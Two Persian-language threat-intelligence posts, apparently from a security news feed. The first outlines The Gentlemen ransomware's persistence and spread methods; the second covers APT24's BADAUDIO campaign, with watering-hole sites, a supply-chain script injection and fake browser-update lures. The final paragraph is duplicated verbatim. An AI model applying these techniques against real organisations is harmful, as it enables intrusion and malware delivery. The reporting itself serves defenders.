از منظر عملیاتی، The Gentlemen دارای یک زنجیره نفوذ بالغ و چندلایه است. این باجافزار از سازوکارهای مختلفی برای انتشار و ماندگاری بهره میگیرد؛ از جمله اجرای دستورات از طریق WMI و PowerShell Remoting، ایجاد Scheduled Taskهای اختصاصی، و سوءاستفاده از سرویسهای قانونی ویندوز برای اجرای بیصدا. علاوه بر این، این خانواده دارای نسخههای جداگانه برای Windows، Linux و ESXi است، که نشاندهنده بلوغ بالای توسعه و هدفگذاری سیستمهای سازمانی در مقیاس گسترده است.
🔥1
تحلیلهای جدید نشان میدهد گروه APT24 در چند سال اخیر رویکرد خود را از حملات محدود و خطی، به یک معماری چندوجهی و هدفمند ارتقا داده است. این گروه کمپینی با نام BADAUDIO را اجرا کرده که نشاندهنده سرمایهگذاری قابلتوجه بر تنوع بردارهای نفوذ و افزایش دقت در انتخاب اهداف است. APT24 علاوه بر بهرهگیری از تکنیکهای «watering-hole» برای آلودهسازی وبسایتهای عمومی مورد مراجعه کاربران، حملات زنجیره تأمین را نیز بهکار گرفته و با نفوذ مکرر به یک شرکت بازاریابی دیجیتال، امکان تزریق اسکریپتهای مخرب به صدها دامنه مشروع را فراهم کرده است.
در بُعد وبمحور این عملیات، اسکریپتهای جاسازیشده با تحلیل ویژگیهای دستگاه کاربر، افراد یا سیستمهای ارزشمندتر را شناسایی میکنند و سپس پنجرههای جعلی مشابه بهروزرسانی مرورگر را نمایش میدهند تا بدافزار اصلی را بر روی دستگاه نصب کنند. این سطح از شخصیسازی در مراحل حمله نشاندهنده توانایی بالای این گروه در انجام عملیات پیچیده، پنهانکار و مبتنی بر مهندسی اجتماعی پیشرفته است.
در بُعد وبمحور این عملیات، اسکریپتهای جاسازیشده با تحلیل ویژگیهای دستگاه کاربر، افراد یا سیستمهای ارزشمندتر را شناسایی میکنند و سپس پنجرههای جعلی مشابه بهروزرسانی مرورگر را نمایش میدهند تا بدافزار اصلی را بر روی دستگاه نصب کنند. این سطح از شخصیسازی در مراحل حمله نشاندهنده توانایی بالای این گروه در انجام عملیات پیچیده، پنهانکار و مبتنی بر مهندسی اجتماعی پیشرفته است.